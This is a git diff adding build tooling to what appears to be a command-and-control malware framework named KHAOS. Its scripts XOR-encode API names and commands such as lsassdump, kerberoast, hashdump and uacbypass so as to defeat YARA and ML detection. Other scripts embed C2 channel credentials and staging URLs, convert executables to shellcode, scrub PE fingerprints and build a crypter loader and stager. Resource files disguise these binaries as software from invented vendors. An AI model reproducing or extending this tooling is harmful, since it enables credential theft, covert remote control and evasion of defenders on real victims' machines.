"fn_LookupPrivilegeValueA", + "OpenProcessToken": "fn_OpenProcessToken", + "OpenThreadToken": "fn_OpenThreadToken", + "RevertToSelf": "fn_RevertToSelf", + "CloseServiceHandle": "fn_CloseServiceHandle", + "EnumServicesStatusExA": "fn_EnumServicesStatusExA", + "OpenSCManagerA": "fn_OpenSCManagerA", + "OpenServiceA": "fn_OpenServiceA", + "QueryServiceConfigA": "fn_QueryServiceConfigA", + "RegisterServiceCtrlHandlerA":"fn_RegisterServiceCtrlHandlerA", + "SetServiceStatus": "fn_SetServiceStatus", + "StartServiceCtrlDispatcherA":"fn_StartServiceCtrlDispatcherA", + "RegDeleteTreeA": "fn_RegDeleteTreeA", + "GetTokenInformation": "fn_GetTokenInformation", + "SetThreadToken": "fn_SetThreadToken", + "PrivilegeCheck": "fn_PrivilegeCheck", + "AllocateAndInitializeSid": "fn_AllocateAndInitializeSid", + "EqualSid": "fn_EqualSid", + "FreeSid": "fn_FreeSid", + "ImpersonateNamedPipeClient": "fn_ImpersonateNamedPipeClient", + "CreateProcessWithTokenW": "fn_CreateProcessWithTokenW", + "CreateProcessAsUserW": "fn_CreateProcessAsUserW", + "CredEnumerateA": "fn_CredEnumerateA", + "CredFree": "fn_CredFree", + + # kernel32.dll + "InitializeProcThreadAttributeList": "fn_InitializeProcThreadAttributeList", + "UpdateProcThreadAttribute": "fn_UpdateProcThreadAttribute", + "DeleteProcThreadAttributeList": "fn_DeleteProcThreadAttributeList", + "ResumeThread": "fn_ResumeThread", + "GetComputerNameA": "fn_GetComputerNameA", + "GetComputerNameW": "fn_GetComputerNameW", + "GetComputerNameExW": "fn_GetComputerNameExW", + "GetNativeSystemInfo": "fn_GetNativeSystemInfo", + "GlobalMemoryStatusEx": "fn_GlobalMemoryStatusEx", + "VirtualProtect": "fn_VirtualProtect", + "Sleep": "fn_Sleep", + "SetEvent": "fn_SetEvent", + "GetThreadContext": "fn_GetThreadContext", + "SetThreadContext": "fn_SetThreadContext", + "MapViewOfFile": "fn_MapViewOfFile", + "UnmapViewOfFile": "fn_UnmapViewOfFile", + "AddVectoredExceptionHandler":"fn_AddVectoredExceptionHandler", + "CreateNamedPipeA": "fn_CreateNamedPipeA", + "ConnectNamedPipe": "fn_ConnectNamedPipe", + "IsWow64Process": "fn_IsWow64Process", + "RtlGetVersion": "fn_RtlGetVersion", + + # winspool.drv + "winspool.drv": "dll_winspool", + "OpenPrinterW": "fn_OpenPrinterW", + "ClosePrinter": "fn_ClosePrinter", + + # shell32.dll + "shell32.dll": "dll_shell32", + "ShellExecuteExW": "fn_ShellExecuteExW", + "ShellExecuteExA": "fn_ShellExecuteExA", + "CheckTokenMembership": "fn_CheckTokenMembership", + + # mscoree.dll + "mscoree.dll": "dll_mscoree", + "CorBindToRuntimeEx": "fn_CorBindToRuntimeEx", + + # advapi32 extra + "RegDeleteKeyA": "fn_RegDeleteKeyA", + "RegCreateKeyExA": "fn_RegCreateKeyExA", + "RegSetValueExA": "fn_RegSetValueExA", + "RegCloseKey": "fn_RegCloseKey", + + # secur32.dll + "LsaConnectUntrusted": "fn_LsaConnectUntrusted", + "LsaLookupAuthenticationPackage":"fn_LsaLookupAuthenticationPackage", + "LsaCallAuthenticationPackage": "fn_LsaCallAuthenticationPackage", + "LsaFreeReturnBuffer": "fn_LsaFreeReturnBuffer", + + # netapi32.dll + "DsGetDcNameW": "fn_DsGetDcNameW", + + # winhttp.dll + "WinHttpCrackUrl": "fn_WinHttpCrackUrl", + "WinHttpOpen": "fn_WinHttpOpen", + "WinHttpConnect": "fn_WinHttpConnect", + "WinHttpOpenRequest": "fn_WinHttpOpenRequest", + "WinHttpSetOption": "fn_WinHttpSetOption", + "WinHttpAddRequestHeaders": "fn_WinHttpAddRequestHeaders", + "WinHttpSetTimeouts": "fn_WinHttpSetTimeouts", + "WinHttpSendRequest": "fn_WinHttpSendRequest", + "WinHttpReceiveResponse": "fn_WinHttpReceiveResponse", + "WinHttpQueryOption": "fn_WinHttpQueryOption", + "WinHttpQueryDataAvailable": "fn_WinHttpQueryDataAvailable", + "WinHttpReadData": "fn_WinHttpReadData", + "WinHttpCloseHandle": "fn_WinHttpCloseHandle", + + # gdi32.dll + "GetDeviceCaps": "fn_GetDeviceCaps", + "CreateCompatibleDC": "fn_CreateCompatibleDC", + "CreateCompatibleBitmap": "fn_CreateCompatibleBitmap", + "SelectObject": "fn_SelectObject", + "BitBlt": "fn_BitBlt", + "StretchBlt": "fn_StretchBlt", + "DeleteDC": "fn_DeleteDC", + "DeleteObject": "fn_DeleteObject", + "GetStockObject": "fn_GetStockObject", + "SetStretchBltMode": "fn_SetStretchBltMode", + "SetBrushOrgEx": "fn_SetBrushOrgEx", + "GetDIBits": "fn_GetDIBits", + + # user32.dll + "GetDC": "fn_GetDC", + "ReleaseDC": "fn_ReleaseDC", + + # BOF Beacon API names + "Beacon": "str_Beacon", + "BeaconPrintf": "str_BeaconPrintf", + "BeaconOutput": "str_BeaconOutput", + "BeaconIsAdmin": "str_BeaconIsAdmin", + "BeaconDataParse": "str_BeaconDataParse", + "BeaconDataExtract": "str_BeaconDataExtract", + "BeaconDataInt": "str_BeaconDataInt", + "BeaconDataShort": "str_BeaconDataShort", + "BeaconDataLength": "str_BeaconDataLength", + + # process names + "winlogon.exe": "str_winlogon_exe", + "services.exe": "str_services_exe", + "spoolsv.exe": "str_spoolsv_exe", + "svchost.exe": "str_svchost_exe", + "lsass.exe": "str_lsass_exe", + "RuntimeBroker.exe": "str_RuntimeBroker_exe", + "dllhost.exe": "str_dllhost_exe", + "explorer.exe": "str_explorer_exe", + + # WMI class name + "Win32_Process": "str_Win32_Process", + + # UAC elevation moniker (stored as bytes; decoded as WCHAR in uac.c) + "Elevation:Administrator!new:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}": + "str_elevation_moniker", + + # Privilege names — decoded at runtime only where needed + "SeDebugPrivilege": "str_SeDebugPrivilege", + "SeImpersonatePrivilege": "str_SeImpersonatePrivilege", + "SeAssignPrimaryTokenPrivilege": "str_SeAssignPrimaryTokenPrivilege", + "SeIncreaseQuotaPrivilege": "str_SeIncreaseQuotaPrivilege", + + # Command dispatch names — kept encoded so plaintext never appears in .rdata + "lsassdump": "str_cmd_lsassdump", + "kerberoast": "str_cmd_kerberoast", + "asreproast": "str_cmd_asreproast", + "steal_token": "str_cmd_steal_token", + "hashdump": "str_cmd_hashdump", + "getsystem": "str_cmd_getsystem", + "uacbypass": "str_cmd_uacbypass", + "inject": "str_cmd_inject", + "privesc": "str_cmd_privesc", + "shinject": "str_cmd_shinject", + "execute-assembly": "str_cmd_execasm", + "bof": "str_cmd_bof", + + # Registry paths used in getsystem / uac — offensive fingerprint + "SOFTWARE\\Policies\\Microsoft\\Windows\\Installer": "str_reg_installer_policy", + "AlwaysInstallElevated": "str_AlwaysInstallElevated", + "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System": "str_reg_policies_system", + "ConsentPromptBehaviorAdmin": "str_ConsentPromptBehaviorAdmin", + + # UAC bypass operational strings — YARA triggers + "ms-settings": "str_ms_settings", + "DelegateExecute": "str_DelegateExecute", + "exefile": "str_exefile", + "mscfile": "str_mscfile", + "AppX3xxs313wwkfjhythsb8q46xdssgfr0": "str_wsreset_clsid", + "fodhelper.exe": "str_fodhelper_exe", + "computerdefaults.exe": "str_computerdefaults_exe", + "wsreset.exe": "str_wsreset_exe", + "sdclt.exe": "str_sdclt_exe", + "eventvwr.exe": "str_eventvwr_exe", + "schtasks.exe": "str_schtasks_exe", + "lifter.exe": "str_lifter_exe", + "WinMgmt": "str_WinMgmt", + "Environment": "str_Environment", + "windir": "str_windir", + "SilentCleanup": "str_SilentCleanup", + + # Persistence masquerade strings + "Software\\Microsoft\\Windows\\CurrentVersion\\Run": "str_reg_run_key", + "MicrosoftUpdateService": "str_persist_reg_val", + "Microsoft Corporation": "str_persist_author", + "LogonTrigger": "str_persist_trigger_id", + "MicrosoftEdgeUpdateTaskMachineCore": "str_persist_task_name", +} + + +def main(): + key = secrets.randbelow(256) + while key == 0: # avoid 0 — XOR identity gives plaintext + key = secrets.randbelow(256) + + lines = [ + "/* AUTO-GENERATED by tools/gen_evs_strings.py — do not edit.", + " * EVS_KEY is randomised every build; all byte arrays change.", + " * Defeats static YARA rules that match encoded API/DLL names.", + " */", + "#ifndef EVS_STRINGS_H", + "#define EVS_STRINGS_H", + "", + f"#define EVS_KEY 0x{key:02x}u", + "", + ] + + prev_group = None + for plaintext, suffix in STRINGS.items(): + group = suffix.split("_")[0] # "dll", "fn", or "str" + if group != prev_group: + labels = {"dll": "DLL names", "fn": "API / function names", + "str": "Misc strings"} + lines.append(f"/* --- {labels.get(group, group)} --- */") + prev_group = group + + enc = [b ^ key for b in plaintext.encode("latin-1")] + arr = ", ".join(f"0x{b:02x}" for b in enc) + lines.append( + f"static const unsigned char EVS_{suffix}[{len(enc)}]" + f" = {{ {arr} }}; /* {plaintext} */" + ) + + lines += [ + "", + "/* Single XOR-decode helper — one definition in src/evs.c, called everywhere.", + " * Replaces 100+ identical inline loops that trigger ML-based heuristics. */", + "#ifndef _EVS_DEC_DECL", + "#define _EVS_DEC_DECL", + "#include ", + "extern void _evs_dec(char *out, const unsigned char *enc, size_t n);", + "#define EVS_D(out, arr) _evs_dec((out), (arr), sizeof(arr))", + "#endif", + "", + "#endif /* EVS_STRINGS_H */", + "", + ] + + out_path = os.path.join( + os.path.dirname(__file__), "..", "include", "evs_strings.h" + ) + with open(out_path, "w") as f: + f.write("\n".join(lines)) + + print(f"[ok] wrote {out_path} (EVS_KEY=0x{key:02x})") + print(f" {len(STRINGS)} strings encoded") + + +if __name__ == "__main__": + main() diff --git a/agent/tools/gen_stager_config.py b/agent/tools/gen_stager_config.py new file mode 100644 index 0000000..5b3177c --- /dev/null +++ b/agent/tools/gen_stager_config.py @@ -0,0 +1,67 @@ +#!/usr/bin/env python3 +""" +Generate agent/include/stager_config.h with XOR-obfuscated staging URL and +ChaCha20 key. Called by the server's build endpoint (never by hand). + +Usage: + python tools/gen_stager_config.py --url --key <32-byte hex> +""" +import sys, os, argparse + +XOR_KEY = b"\x7a\x3f\x91\xc4\x52\x88\xb1\xde\xad\xbe\xef\x13\x37\xca\xfe\x42" +XOR_KEY_LEN = len(XOR_KEY) + + +def xor_encode(data: bytes) -> list: + return [b ^ XOR_KEY[i % XOR_KEY_LEN] for i, b in enumerate(data)] + + +def main(): + ap = argparse.ArgumentParser() + ap.add_argument("--url", required=True, help="Staging URL") + ap.add_argument("--key", required=True, help="32-byte ChaCha20 key (hex)") + args = ap.parse_args() + + url_enc = xor_encode(args.url.encode()) + key_raw = bytes.fromhex(args.key) + if len(key_raw) != 32: + print("[error] --key must be 32 bytes (64 hex chars)", file=sys.stderr) + sys.exit(1) + key_enc = xor_encode(key_raw) + + key_hex = ", ".join(f"0x{b:02x}" for b in XOR_KEY) + url_arr = ", ".join(f"0x{b:02x}" for b in url_enc) + key_arr = ", ".join(f"0x{b:02x}" for b in key_enc) + url_prev = args.url[:48] + ("…" if len(args.url) > 48 else "") + + h = f"""\ +/* AUTO-GENERATED by tools/gen_stager_config.py — do not edit manually. */ +#ifndef STAGER_CONFIG_H +#define STAGER_CONFIG_H + +#ifndef CFG_XOR_KEY_LEN +#define CFG_XOR_KEY_LEN {XOR_KEY_LEN} +static const unsigned char CFG_XOR_KEY[{XOR_KEY_LEN}] = {{ {key_hex} }}; +#endif + +/* STAGE_URL — XOR-encoded ({len(url_enc)} bytes) */ +/* plaintext preview: {url_prev!r} */ +static const unsigned char CFG_STAGE_URL[] = {{{url_arr}, 0x00}}; +#define CFG_STAGE_URL_LEN {len(url_enc)} + +/* STAGE_KEY — ChaCha20 key, XOR-encoded (32 bytes) */ +static const unsigned char CFG_STAGE_KEY[32] = {{{key_arr}}}; + +#endif /* STAGER_CONFIG_H */ +""" + + out = os.path.join(os.path.dirname(__file__), "..", "include", "stager_config.h") + with open(out, "w") as f: + f.write(h) + print(f"[ok] {out}") + print(f" URL {args.url}") + print(f" KEY {args.key[:8]}...") + + +if __name__ == "__main__": + main() diff --git a/agent/tools/get_cert_pin.py b/agent/tools/get_cert_pin.py new file mode 100644 index 0000000..0a70507 --- /dev/null +++ b/agent/tools/get_cert_pin.py @@ -0,0 +1,33 @@ +#!/usr/bin/env python3 +""" +Get the SHA-256 pin of a TLS server's leaf certificate (DER bytes). +Usage: python tools/get_cert_pin.py [port] + +Output: 64 hex chars — paste into server/config.yaml → http.cert_pin +""" +import ssl, socket, hashlib, sys + +host = sys.argv[1] if len(sys.argv) > 1 else None +port = int(sys.argv[2]) if len(sys.argv) > 2 else 443 + +if not host: + print("Usage: python tools/get_cert_pin.py [port]") + sys.exit(1) + +ctx = ssl.create_default_context() +ctx.check_hostname = False +ctx.verify_mode = ssl.CERT_NONE + +try: + with socket.create_connection((host, port), timeout=10) as sock: + with ctx.wrap_socket(sock, server_hostname=host) as ssock: + der = ssock.getpeercert(binary_form=True) + pin = hashlib.sha256(der).hexdigest() + print(f"[+] {host}:{port}") + print(f"[+] SHA-256 pin: {pin}") + print() + print(f"# Paste into server/config.yaml:") + print(f' cert_pin: "{pin}"') +except Exception as e: + print(f"[-] Error: {e}", file=sys.stderr) + sys.exit(1) diff --git a/agent/tools/obfuscate.py b/agent/tools/obfuscate.py new file mode 100644 index 0000000..2f3cd5a --- /dev/null +++ b/agent/tools/obfuscate.py @@ -0,0 +1,138 @@ +#!/usr/bin/env python3 +""" +Generate agent/include/agent_config.h with XOR-obfuscated compile-time credentials. +Usage: python tools/obfuscate.py [config.yaml] + python tools/obfuscate.py (reads ../server/config.yaml by default) + +The generated header is included by channels/github.c. +Strings are XOR'd with a rolling multi-byte key so `strings agent.exe` +cannot extract them in plaintext. +""" +import sys, os, struct +from datetime import datetime, timezone + +# Rolling XOR key — all non-printable bytes, no ASCII substring detectable by strings(1) +XOR_KEY = b"\x7a\x3f\x91\xc4\x52\x88\xb1\xde\xad\xbe\xef\x13\x37\xca\xfe\x42" +XOR_KEY_LEN = len(XOR_KEY) + +# ── Config values to embed ──────────────────────────────────────────────────── +# Edit these before calling the script, or pass a config.yaml (parsed below). +VALUES = { + "GITHUB_TOKEN": "", + "GIST_CMD_ID": "", + "GIST_OUT_ID": "", + "TEAMS_TENANT": "", + "TEAMS_CLIENT": "", + "TEAMS_SECRET": "", + "TEAMS_WEBHOOK": "", + "TEAMS_TEAM_ID": "", + "TEAMS_CHANNEL": "", + "BEACON_URL": "", + "DOH_DOMAIN": "", + "KILL_DATE": "", # Unix timestamp string, "0" = disabled + "CERT_PIN": "", # 64 hex chars (SHA-256 of leaf cert DER), "" = disabled + "SMB_HOST": "", # SMB pivot: hostname or IP, "" = disabled + "SMB_PIPE": "", # SMB pivot: pipe name (no leading backslash) +} + + +def load_yaml(path: str) -> None: + """Minimal YAML loader — no external dependency needed.""" + import re + with open(path) as f: + text = f.read() + + def get(section, key): + pat = rf"{section}:\s*\n(?:[ \t]+\S[^\n]*\n)*?[ \t]+{key}:\s*[\"']?([^\"'\n]+)[\"']?" + m = re.search(pat, text) + return m.group(1).strip() if m else "" + + VALUES["GITHUB_TOKEN"] = get("github", "token") + VALUES["GIST_CMD_ID"] = get("github", "gist_cmd") + VALUES["GIST_OUT_ID"] = get("github", "gist_out") + VALUES["TEAMS_TENANT"] = get("teams", "tenant_id") + VALUES["TEAMS_CLIENT"] = get("teams", "client_id") + VALUES["TEAMS_SECRET"] = get("teams", "client_secret") + VALUES["TEAMS_WEBHOOK"] = get("teams", "webhook_url") + VALUES["TEAMS_TEAM_ID"] = get("teams", "team_id") + VALUES["TEAMS_CHANNEL"] = get("teams", "channel_id") + VALUES["BEACON_URL"] = get("http", "beacon_url") + VALUES["CERT_PIN"] = get("http", "cert_pin") + VALUES["DOH_DOMAIN"] = get("doh", "domain") + VALUES["SMB_HOST"] = get("smb", "host") + VALUES["SMB_PIPE"] = get("smb", "pipe") + + kd_raw = get("agent", "killdate") # "YYYY-MM-DD" or empty + if kd_raw: + try: + dt = datetime.strptime(kd_raw, "%Y-%m-%d").replace(tzinfo=timezone.utc) + VALUES["KILL_DATE"] = str(int(dt.timestamp())) + except ValueError: + print(f"[warn] killdate '{kd_raw}' not in YYYY-MM-DD format — ignored", + file=sys.stderr) + VALUES["KILL_DATE"] = "0" + else: + VALUES["KILL_DATE"] = "0" + + +def xor_encode(s: str) -> list[int]: + data = s.encode() + return [b ^ XOR_KEY[i % XOR_KEY_LEN] for i, b in enumerate(data)] + + +def emit_array(name: str, value: str) -> str: + if not value: + return f"/* {name}: not configured */\nstatic const unsigned char CFG_{name}[] = {{0x00}};\n#define CFG_{name}_LEN 0\n" + enc = xor_encode(value) + arr = ", ".join(f"0x{b:02x}" for b in enc) + preview = value[:32] + ("…" if len(value) > 32 else "") + lines = [ + f"/* {name} — XOR-encoded ({len(enc)} bytes) */", + f"/* plaintext preview: {preview!r} */", + f"static const unsigned char CFG_{name}[] = {{{arr}, 0x00}};", + f"#define CFG_{name}_LEN {len(enc)}", + "", + ] + return "\n".join(lines) + + +def main(): + yaml_path = sys.argv[1] if len(sys.argv) > 1 else \ + os.path.join(os.path.dirname(__file__), "..", "..", "server", "config.yaml") + + if os.path.exists(yaml_path): + load_yaml(yaml_path) + else: + print(f"[warn] config.yaml not found at {yaml_path} — using empty values", file=sys.stderr) + + key_hex = ", ".join(f"0x{b:02x}" for b in XOR_KEY) + header = f"""\ +/* AUTO-GENERATED by tools/obfuscate.py — do not edit manually. + * Re-run: python tools/obfuscate.py [../server/config.yaml] + * XOR key (rolling {XOR_KEY_LEN} bytes): {{ {key_hex} }} + */ +#ifndef AGENT_CONFIG_H +#define AGENT_CONFIG_H + +#define CFG_XOR_KEY_LEN {XOR_KEY_LEN} +static const unsigned char CFG_XOR_KEY[{XOR_KEY_LEN}] = {{ {key_hex} }}; + +""" + + for name, value in VALUES.items(): + header += emit_array(name, value) + + header += "\n#endif /* AGENT_CONFIG_H */\n" + + out_path = os.path.join(os.path.dirname(__file__), "..", "include", "agent_config.h") + with open(out_path, "w") as f: + f.write(header) + + print(f"[ok] wrote {out_path}") + for k, v in VALUES.items(): + status = f"({len(v)} chars)" if v else "EMPTY" + print(f" {k:<20} {status}") + + +if __name__ == "__main__": + main() diff --git a/agent/tools/pe2sc.py b/agent/tools/pe2sc.py new file mode 100644 index 0000000..e495d04 --- /dev/null +++ b/agent/tools/pe2sc.py @@ -0,0 +1,82 @@ +#!/usr/bin/env python3 +""" +pe2sc.py — convert a PE executable to position-independent shellcode via donut. + +Usage: + python pe2sc.py + +Requires ONE of: + a) pip install donut-shellcode (Python extension, needs MSVC on Windows) + b) donut.exe in PATH or tools/ (pre-built binary from github.com/TheWover/donut) + +Download donut.exe: + https://github.com/TheWover/donut/releases +""" +import sys +import os +import subprocess +import shutil + + +def _via_python(in_path: str, out_path: str) -> bool: + try: + import donut # type: ignore + except ImportError: + return False + shellcode = donut.create(file=in_path, arch=3, entropy=3) + with open(out_path, "wb") as fh: + fh.write(shellcode) + print(f"[ok] {out_path} ({len(shellcode)} bytes) [donut python]") + return True + + +def _via_binary(in_path: str, out_path: str) -> bool: + # Look for donut.exe in PATH, then next to this script + donut_bin = shutil.which("donut") or shutil.which("donut.exe") + if not donut_bin: + script_dir = os.path.dirname(os.path.abspath(__file__)) + candidate = os.path.join(script_dir, "donut.exe") + if os.path.exists(candidate): + donut_bin = candidate + if not donut_bin: + return False + + # donut.exe -f 1 (raw) -a 3 (x86+x64) -e 3 (encrypt+random) -o + cmd = [donut_bin, "-f", "1", "-a", "3", "-e", "3", "-o", out_path, in_path] + r = subprocess.run(cmd, capture_output=True, text=True) + if r.returncode != 0: + print(r.stderr or r.stdout, file=sys.stderr) + return False + sz = os.path.getsize(out_path) if os.path.exists(out_path) else 0 + print(f"[ok] {out_path} ({sz} bytes) [donut binary]") + return True + + +def main(): + if len(sys.argv) != 3: + print(f"usage: {sys.argv[0]} ", file=sys.stderr) + sys.exit(1) + + in_path, out_path = sys.argv[1], sys.argv[2] + + if not os.path.exists(in_path): + print(f"error: {in_path}: file not found", file=sys.stderr) + sys.exit(1) + + if _via_python(in_path, out_path): + return + if _via_binary(in_path, out_path): + return + + print( + "error: donut not found.\n" + " option 1: pip install donut-shellcode (requires MSVC on Windows)\n" + " option 2: place donut.exe in PATH or agent/tools/\n" + " https://github.com/TheWover/donut/releases", + file=sys.stderr, + ) + sys.exit(1) + + +if __name__ == "__main__": + main() diff --git a/agent/tools/pe_scrub.py b/agent/tools/pe_scrub.py new file mode 100644 index 0000000..e0eb5c8 --- /dev/null +++ b/agent/tools/pe_scrub.py @@ -0,0 +1,84 @@ +#!/usr/bin/env python3 +""" +pe_scrub.py — post-build PE normalization. + - Timestamp: random plausible past date (2021-2024) + - Checksum: 0x00000000 + - DOS stub padding: randomized (defeats stub fingerprint) + - Debug directory: timestamp fields zeroed +""" +import sys, os, struct, random, time, datetime + +def scrub(path): + with open(path, 'r+b') as f: + data = bytearray(f.read()) + + if data[:2] != b'MZ': + print(f"[!] pe_scrub: not a PE: {path}"); return 1 + + e_lfanew = struct.unpack_from(' pad_start: + for i in range(pad_start, pad_end): + data[i] = random.randint(0, 255) + + # Parse section table (needed for both debug dir and .comment) + num_sections = struct.unpack_from('= 28: + fo = rva_to_off(dbg_rva) + if fo: + struct.pack_into('"); sys.exit(1) + sys.exit(scrub(sys.argv[1])) diff --git a/build-linux.sh b/build-linux.sh new file mode 100644 index 0000000..f4688d0 --- /dev/null +++ b/build-linux.sh @@ -0,0 +1,67 @@ +#!/usr/bin/env bash +# ============================================================ +# KHAOS C2 — Build script for Kali Linux / Debian +# Run this on the Linux machine where you want to build +# ============================================================ +set -e + +SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)" +SERVER_DIR="$SCRIPT_DIR/server" +UI_DIR="$SCRIPT_DIR/ui" +BINARIES_DIR="$UI_DIR/src-tauri/binaries" + +echo "[*] Installing system dependencies..." +sudo apt-get update -qq +sudo apt-get install -y --no-install-recommends \ + curl wget git build-essential pkg-config \ + libssl-dev libsqlite3-dev python3 python3-pip python3-venv \ + libwebkit2gtk-4.1-dev libgtk-3-dev libayatana-appindicator3-dev \ + librsvg2-dev patchelf + +# ---- Node.js ---- +if ! command -v node &>/dev/null; then + echo "[*] Installing Node.js..." + curl -fsSL https://deb.nodesource.com/setup_20.x | sudo -E bash - + sudo apt-get install -y nodejs +fi + +# ---- Rust ---- +if ! command -v cargo &>/dev/null; then + echo "[*] Installing Rust..." + curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh -s -- -y + source "$HOME/.cargo/env" +fi +source "$HOME/.cargo/env" + +# ---- Python venv ---- +echo "[*] Setting up Python venv..." +cd "$SERVER_DIR" +python3 -m venv venv +./venv/bin/pip install -q -r requirements.txt +./venv/bin/pip install -q pyinstaller + +# ---- Build khaos-server (Linux binary) ---- +echo "[*] Building khaos-server with PyInstaller..." +./venv/bin/pyinstaller --clean khaos-server.spec + +# Copy sidecar with Linux target triple name +mkdir -p "$BINARIES_DIR" +TRIPLE="x86_64-unknown-linux-gnu" +cp dist/khaos-server "$BINARIES_DIR/khaos-server-$TRIPLE" +chmod +x "$BINARIES_DIR/khaos-server-$TRIPLE" +echo "[+] Sidecar copied: khaos-server-$TRIPLE" + +# ---- Build Tauri UI ---- +echo "[*] Installing npm dependencies..." +cd "$UI_DIR" +npm install --silent + +echo "[*] Building Tauri app for Linux..." +cargo tauri build + +echo "" +echo "[+] Build complete!" +echo " .deb: $UI_DIR/src-tauri/target/release/bundle/deb/" +echo " AppImage: $UI_DIR/src-tauri/target/release/bundle/appimage/" +echo "" +echo "[!] Config & DB will be stored in ~/.local/share/KHAOS/ on first run" diff --git a/crypter/build.py b/crypter/build.py new file mode 100644 index 0000000..305bad0 --- /dev/null +++ b/crypter/build.py @@ -0,0 +1,104 @@ +#!/usr/bin/env python3 +""" +build.py — crypter build pipeline. + +Modes: + python build.py full: agent + bake + loader + python build.py --bake-only bake + loader (existing agent.exe) + python build.py --stub-only loader only (existing payload files) + python build.py --stager-url full + stager (downloads from url) + python build.py --bake-only --stager-url + python build.py --ignore-cert stager skips TLS cert check +""" +import subprocess +import sys +import os +import shutil +import argparse + +ROOT = os.path.dirname(os.path.abspath(__file__)) +AGENT = os.path.normpath(os.path.join(ROOT, "..", "agent")) +STUB = os.path.join(ROOT, "stub") +STAGER = os.path.join(ROOT, "stager") +TOOLS = os.path.join(ROOT, "tools") +OUTPUT = os.path.join(ROOT, "output") + +def _find(name: str, *fallbacks: str) -> str: + found = shutil.which(name) + if found: + return found + for fb in fallbacks: + if os.path.isfile(fb): + return fb + raise FileNotFoundError( + f"Cannot find '{name}'. Install it or add it to PATH." + ) + +MAKE = _find("make", r"C:\msys64\usr\bin\make.exe") +PYTHON = _find("python", r"C:\msys64\mingw64\bin\python.exe", sys.executable) + + +def run(cmd: list, cwd: str = None) -> None: + print(f"[+] {' '.join(str(x) for x in cmd)}") + r = subprocess.run(cmd, cwd=cwd) + if r.returncode != 0: + sys.exit(r.returncode) + + +def main() -> None: + ap = argparse.ArgumentParser() + ap.add_argument("--bake-only", action="store_true") + ap.add_argument("--stub-only", action="store_true") + ap.add_argument("--stager-url", default=None, + help="Build stager that downloads from this URL") + ap.add_argument("--ignore-cert", action="store_true", + help="Stager ignores TLS cert errors") + args = ap.parse_args() + + agent_bin = os.path.join(AGENT, "agent.exe") + + # 1. build agent + if not args.bake_only and not args.stub_only: + run([MAKE, "build-only"], cwd=AGENT) + + # 2. bake + if not args.stub_only: + if not os.path.isfile(agent_bin): + sys.exit(f"[!] agent.exe not found: {agent_bin}") + bake_cmd = [PYTHON, os.path.join(TOOLS, "bake.py"), + agent_bin, "--out-dir", STUB] + if args.stager_url: + bake_cmd += ["--stager-url", args.stager_url] + if args.ignore_cert: + bake_cmd += ["--ignore-cert"] + run(bake_cmd) + + # 3. check payload files + if not os.path.isfile(os.path.join(STUB, "payload_meta.h")) or \ + not os.path.isfile(os.path.join(STUB, "payload.bin")): + sys.exit(f"[!] payload files missing in {STUB}") + + # 4. build loader (embedded payload) + run([MAKE], cwd=STUB) + + os.makedirs(OUTPUT, exist_ok=True) + loader_src = os.path.join(STUB, "loader.exe") + loader_dst = os.path.join(OUTPUT, "loader.exe") + shutil.copy2(loader_src, loader_dst) + print(f"[ok] loader {os.path.getsize(loader_dst)//1024} KB -> {loader_dst}") + + # 5. build stager (network download) if requested + if args.stager_url: + if not os.path.isfile(os.path.join(STAGER, "stager_cfg.h")): + sys.exit(f"[!] stager_cfg.h missing — bake with --stager-url failed?") + run([MAKE], cwd=STAGER) + stager_src = os.path.join(STAGER, "stager.exe") + stager_dst = os.path.join(OUTPUT, "stager.exe") + shutil.copy2(stager_src, stager_dst) + payload_srv = os.path.join(STAGER, "payload.bin") + print(f"[ok] stager {os.path.getsize(stager_dst)//1024} KB -> {stager_dst}") + print(f"[!!] upload {payload_srv} to your server at {args.stager_url}") + + +if __name__ == "__main__": + main() diff --git a/crypter/res/loader.manifest b/crypter/res/loader.manifest new file mode 100644 index 0000000..3ee043b --- /dev/null +++ b/crypter/res/loader.manifest @@ -0,0 +1,30 @@ + + + + System Metrics Collector + + + + + + + + + + + + + + + + + + PerMonitorV2 + true + + + diff --git a/crypter/res/loader.rc b/crypter/res/loader.rc new file mode 100644 index 0000000..15bdf95 --- /dev/null +++ b/crypter/res/loader.rc @@ -0,0 +1,33 @@ +#include + +VS_VERSION_INFO VERSIONINFO + FILEVERSION 2,4,1,0 + PRODUCTVERSION 2,4,1,0 + FILEFLAGSMASK VS_FFI_FILEFLAGSMASK + FILEFLAGS 0x0L + FILEOS VOS_NT_WINDOWS32 + FILETYPE VFT_APP + FILESUBTYPE VFT2_UNKNOWN +BEGIN + BLOCK "StringFileInfo" + BEGIN + BLOCK "040904B0" + BEGIN + VALUE "CompanyName", "Veristone Technologies Inc." + VALUE "FileDescription", "System Metrics Collector" + VALUE "FileVersion", "2.4.1.0" + VALUE "InternalName", "metricsd" + VALUE "LegalCopyright", "Copyright (C) 2023 Veristone Technologies Inc. All rights reserved." + VALUE "OriginalFilename", "metricsd.exe" + VALUE "ProductName", "VeriMetrics Suite" + VALUE "ProductVersion", "2.4" + END + END + BLOCK "VarFileInfo" + BEGIN + VALUE "Translation", 0x0409, 0x04B0 + END +END + +1 RT_MANIFEST "loader.manifest" +101 RCDATA "payload.bin" diff --git a/crypter/res/stager.manifest b/crypter/res/stager.manifest new file mode 100644 index 0000000..6ef3881 --- /dev/null +++ b/crypter/res/stager.manifest @@ -0,0 +1,29 @@ + + + + Automated content synchronization service + + + + + + + + + + + + + + + + + + PerMonitorV2 + + + diff --git a/crypter/res/stager.rc b/crypter/res/stager.rc new file mode 100644 index 0000000..23a1aae --- /dev/null +++ b/crypter/res/stager.rc @@ -0,0 +1,32 @@ +#include + +VS_VERSION_INFO VERSIONINFO + FILEVERSION 1,2,0,4 + PRODUCTVERSION 1,2,0,4 + FILEFLAGSMASK VS_FFI_FILEFLAGSMASK + FILEFLAGS 0x0L + FILEOS VOS_NT_WINDOWS32 + FILETYPE VFT_APP + FILESUBTYPE VFT2_UNKNOWN +BEGIN + BLOCK "StringFileInfo" + BEGIN + BLOCK "040904B0" + BEGIN + VALUE "CompanyName", "Procyon Software Solutions" + VALUE "FileDescription", "Automated Content Synchronization" + VALUE "FileVersion", "1.2.0.4" + VALUE "InternalName", "autosync" + VALUE "LegalCopyright", "Copyright (C) 2022 Procyon Software Solutions. All rights reserved." + VALUE "OriginalFilename", "AutoSync.exe" + VALUE "ProductName", "AutoSync Manager" + VALUE "ProductVersion", "1.2" + END + END + 